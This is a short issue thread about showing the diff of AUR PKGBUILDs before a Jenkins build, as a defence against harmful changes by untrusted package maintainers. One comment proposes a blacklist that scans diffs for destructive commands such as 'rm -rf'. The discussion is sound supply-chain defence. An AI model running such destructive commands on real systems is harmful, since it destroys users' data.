Show git diff before build #9
Comments
|
I don't know how advanced pacmans hooks are. ideally, each packages stores the pkgbuild it was built with in some directore (maybe under /var) and we have an preinstall-hook inplace that diffs the new pkgbuild against whatever is stored there, showing the diff (and asking for confirmation?). This is the only way there can be any kind of trust into the repository, as currently, we are building PKGBUILDs that are maintained by heaven knows whom and this person could cause any kind of damage in its PKGBUILD/install-file. The diff should also include all files/patches/artifacts that are stored in the packages git-repository... |
|
Jenkins takes care about pulling from the AUR repos. So it should be easy to display a diff here to the last build. A diff in that sense would be a git diff between the old job run and the new one. I don't think that any pacman hooks are required here. I don't like the idea of asking for confirmation, that would break the CD process. The package should always be build without manual interaction. A sort of white/blacklist that scans the diff and stops the deployment would be okay (e.g. grep for rm -rf) |
@noctux requested something like this. What do we want to show here. diff between the last run and now? the last successful build?
The text was updated successfully, but these errors were encountered: